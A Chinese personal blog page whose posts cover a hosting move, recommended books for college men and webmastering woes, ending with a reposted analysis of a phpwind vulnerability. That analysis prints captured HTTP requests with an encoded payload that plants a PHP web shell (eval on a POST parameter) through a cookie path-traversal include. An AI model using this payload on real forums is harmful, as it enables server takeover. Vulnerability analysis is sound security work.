无可赖何_{阿肆的个人博客}

阿肆的个人博客和大家有段时间没有见面了，自从上次空间停了之后一直没有找到好的空间放博客，这次感谢番茄同学给了我一个旺角的空间！真是非常谢谢
空间是早段时间就拿到了，不过上次刚好将文件传上去，TNND，旺角的服务器出问题，硬盘出现不可恢复的错误，哭啊！
我的博客本来就只备份了数据库和附件文件的，（不过都不知道附件文件是否有丢失的），风格也是不小心在附件中找到了，呵呵~算是幸运了，至于其他的一些修改的东西，555，没了，还原pj2.6 b2的原程序了。
哭啊~~

同时，这次之后博客不再使用shuo.aerfa.org域名，虽然pr不小心弄到3了。以后统一使用www.ivershuo.com访问。有做了链接的朋友，如果是用的前一个域名的，麻烦改下，谢谢了！

又有得改了，555.

今天上选修课，老师说到了大学男生急需恶补的5本书，于是下课了来找找看是哪些，突然发现自己却真的5本都没有看过，是在惭愧！

也像大家推荐下吧，有时间大家也读读

大学男生急需恶补的5本书之一：《三国志》《三国志》在豆瓣

我们以陈寿的为标准，在谈论三国的时候，请各位男生不要再拿《三国演义》说事儿了，这是小学时看和谈论的东西，如果说大学了，你还在对《三国演义》痴迷，我只有送你一句话：孩子，该长大了。

崇拜关羽，那是香港人干的事情，当然，香港也是我国领土不可分割的一部分。看过《三国志》的人，我相信都会对关羽有个正确的评价，如果说关羽的千里走单骑很了不起，那廖化的千里走单骑更是让人感动。不要再认为三把火烧新野是诸葛亮干的了，他只是个出色的战略家，在很多方面他不如曹操。如果到了大学，你和同学们聊天的时候，还认为张飞只是一介武夫。那你最好不要混了，真的，看看汉中攻略战，什么叫指挥，什么叫军事天才。在中国来说谈三国的人很多，你不懂，或是乱说话，那真的很没面子。不要听易中天说什么就是什么，你最好是自己看一下。

大学男生急需恶补的5本书之二：《史记》史记在豆瓣

　　《史记》确实太了不起了，如果你是个汉人，你这辈子没看过史记，那真的太悲哀了。少数民族除外哟，他们有他们的史家经典。对汉族来说，对一个成年男子来说，没看过史记，我觉得，你的人生观和价值观都是有问题的。

《史记》很了不起，我觉得，读过《史记》的人出去面试，比那些把面试大全啊，什么卡耐基啊看完了的人面试成功的可能性还要大，不过好多大学男生看不懂就是了。看看《留侯列传》什么是大智慧，什么是做人；看看《项羽本纪》什么叫傻B讲义气；看看《吕不韦列传》什么叫投资。在史记里，真的可以找到很多东西，比如金庸的小说里，有的武功都是那里面来的，什么八荒六合功，什么是八荒，什么是六合，《史记》里都有提到。太史公司马迁是一个了不起的人，很多东西都要跟他学。

看过其中的几篇

大学男生急需恶补的5本书之三：《诗经》 诗经在豆瓣

《诗经》不是什么高深的东西，细细的看，谁都能看懂，那里面的诗，其实都是当时什么的对话，很多很有意思。介绍大学男生看这本书，主要是想让大家学习一下，情书该怎么写，搞到大学了，还让别人当枪手，代写情书，那真的太丢人了。《诗经》里的情诗太多了，好好学，能长很多见识的。自己也可以写情诗，只是不要写成梨花派就是了。

大学男生急需恶补的5本书之四：《红岩》红岩在豆瓣

我认为大学生是应该看看这些东西的，国家不是你们打下来的，你们凭什么对国家指指点点，你们有现在的幸福生活，都是别人给的，你们对国家还一点儿贡献都没有做。别的也不要试，不要你们自己试老虎凳、辣椒水，你们自己拿根牙签，刺一下自己的指甲缝，试一下什么感觉，然后再想想，你在唱国歌时的表现，你是不是想打自己一个嘴巴。

大学男生急需恶补的5本书之五：《少儿百科全书》 少儿百科全书在豆瓣

　其实也不一定要是《少儿百科全书》，《十万个为什么》，《世界真奇妙》都行，了解一下自然，真的，我做为一个工科，和班上另一个同学一起作课题，我给他说用虹吸原理，他却问我虹吸原理是什么。你们说这种事情……让我怎么说好，长点儿见识不是坏事。

小时候看过这类的倒是几本，呵呵~

在落伍看到一篇帖子：邻居训孩子，不好好学习，长大了想当站长啊。

步入这个圈子有一段时间了，虽然没有什么成就。感受了做站长的辛苦和无奈。

刚才从阿尔法思维论坛过来，看到有几只蜘蛛在爬，没有管它，因为aer[color=Red]fa的缘故，已经不在乎它们的收录了。依旧关闭游客浏览。

过几天就去长沙开站长交流大会了，身上都没有钱。

每天都在落伍上面，看到的站长都是起早摸黑的，大家都很辛苦，不过有些人还是赚了钱的。

这两天关于谷歌输入法盗用搜狗词库的问题炒得很厉害。
我还是那个说法：[color=Green]谷歌不是Google！

我也“作恶”一次，在论坛第一次放了广告，不过虽说是广告，几乎就是firefox推介的那个算是广告吧，因为其他的都只是给论坛会员提供优惠的注册而已，自己贴网费，贴支付宝转账手续费，贴逃课来帮大家注册，我多少拿的就给大家多少了。唉~

不说不说了，总之，作站很辛苦，很无奈。
孩子，不好好学习，将来想做站长吧！

PW又出漏洞了：
案列：
http://www.phpwind.net/read-htm-tid-391918.html

http://www.phpwind.net/read-htm-tid-391955.html

http://www.phpwind.net/read-htm-tid-391918.html

同时转篇文章：分析phpwind漏洞

怎么说呢，这个漏洞是pinkeyes发现的，本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的，我还在冒虚汗中，同时pinkeyes 的睿智深深的打动了我，原来我才明白什么才是真正的技术含量。且听我慢慢道来：
在程序运行时，我抓了一个包：

GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=< ?fputs(fopen
(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),
chr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).
chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1
Content-Type: text/html
Cookie:skinco=../../require/hidden;
Host: www.5a609.com:81
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

GET /phpwind//attachment/set.php HTTP/1.1
Content-Type: text/html
Cookie:skinco=../../require/hidden;
Host: www.5a609.com:81
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

Chr()里的那些东西我查了一下ascii字符表，得到的是这样的：
< ?fputs(fopen(./error.php,w)?>
很显然是在error.php里写入一行php木马：< ? eval($_post[cmd]);?> 。
所以关键是：
GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=中$D_name和$tidwt的出处。这两个东西很重要！于是我下了一个phpwind 的程序看看，开始以为是job.php有问题。进入job.php中，只发现如下代码：

elseif($previewjob=='preview'){
require_once(R_P.'require/bbscode.php');
require_once(R_P.'header.php');
if (empty($skin)) $skin=$db_defaultstyle;
if (file_exists(R_P."data/style/$skin.php")){
include_once("data/style/$skin.php");
}
好，在失望的同时也发现了$skin一定有问题，job.php文件头有个：require_once("./global.php");
接着我们来看看global.php里面的$skin参数吧：

if ($db_refreshtime!=0){
if('C:'.$REQUEST_URI==$lastpath && $onbbstime< $db_refreshtime){
!$_COOKIE['winduid'] && $groupid='guest';
$skin=$skinco ? $skinco : $db_defaultstyle;
Showmsg("refresh_limit");
}
哦，只要我们定义了$skinco就可以满足$skin了！所以再找找$skinco吧，$skinco只有一处解释，其后，并没有做任何过滤：
if($skinco && file_exists(R_P."data/style/$skinco.php")){
Cookie('skinco',$skinco);
哈哈，好轻松，只要存在就可以？这样只要构造一个cookie就完全可以实现。咦？$skinco我们好象哪里见过。果然，就是上面抓的包里面的：
Cookie:skinco=../../require/hidden;
这样就更加证明我的思路是正确的，风回路转呀。又不得不佩服这样精彩的手法，按照pinkeyes的思路：构造后应该是这样的：
data/style/../../require/hidden.php
也就是./require/hidden.php。
这样也就是满足了job.php中的

if (file_exists(R_P."data/style/$skin.php")){
include_once("data/style/$skin.php");
到这里，先告一段落，我们回个头想想。我们分析这么多就是pinkeyes要为了包含一个文件：./require/hidden.php。这就奇怪了，为什么这么pinkeyes要千方百计的来包含 ./require/hidden.php呢？直接利用不可以吗？这个hidden.php到底是个什么样的文件呢？恩，下面的解释会让你有一个满意的答案。
我小心翼翼的打开hidden.php

!function_exists('readover') && exit('Forbidden');
$newonline="<>\t$timestamp\t$onlineip\t$fidwt\t$tidwt\t$groupid\t$wherebbsyou\t$acttime\t$uid\t$windid\t";
$newonline=str_pad($newonline,$db_olsize)."\n";
$onlineuser=readover(R_P.$D_name);
if($offset=strpos($onlineuser,"\t".$windid."\t")){
$inselectfile='N';
$offset=strpos($onlineuser,"\n",$offset-$db_olsize);$offset+=1;/*会员名不在开始需要转换指针*/
writeinline(R_P.$D_name,$newonline,$offset);
}elseif($offset=strpos($onlineuser,str_pad(' ',$db_olsize)."\n")){
writeinline(R_P.$D_name,$newonline,$offset);
}else{
writeover(R_P.$D_name,$newonline,"ab");
}
?>

看到这里，所有的疑团都解开了！
1．原来文件头多了个
!function_exists('readover') && exit('Forbidden');
这样直接访问是不允许的，后面的代码也不会执行，这样我明白pinkeyes的苦心多走弯路来努力用include来包含这个文件
2 这个文件里有writeline()是可以写入木马的。$newonline正好也定义了$tidwt，所以最后的writeline()把$tidwt也写进去了。
写入到了d_name 所定义的set.php这个临时文件里。本来这样就可以写入一个小木马了，只要使$tidwt为编码：< ? eval($_post[cmd]);?>就可以的。但是可能是pinkeyes考虑到set.php里的东西比较乱。所以煞费苦心的用
< ?fputs(fopen(./error.php,w)?>
写入一个更简单的木马到error.php里！这样才多了我们抓的第二个包：
GET /phpwind//attachment/set.php HTTP/1.1
。。。。。。。。。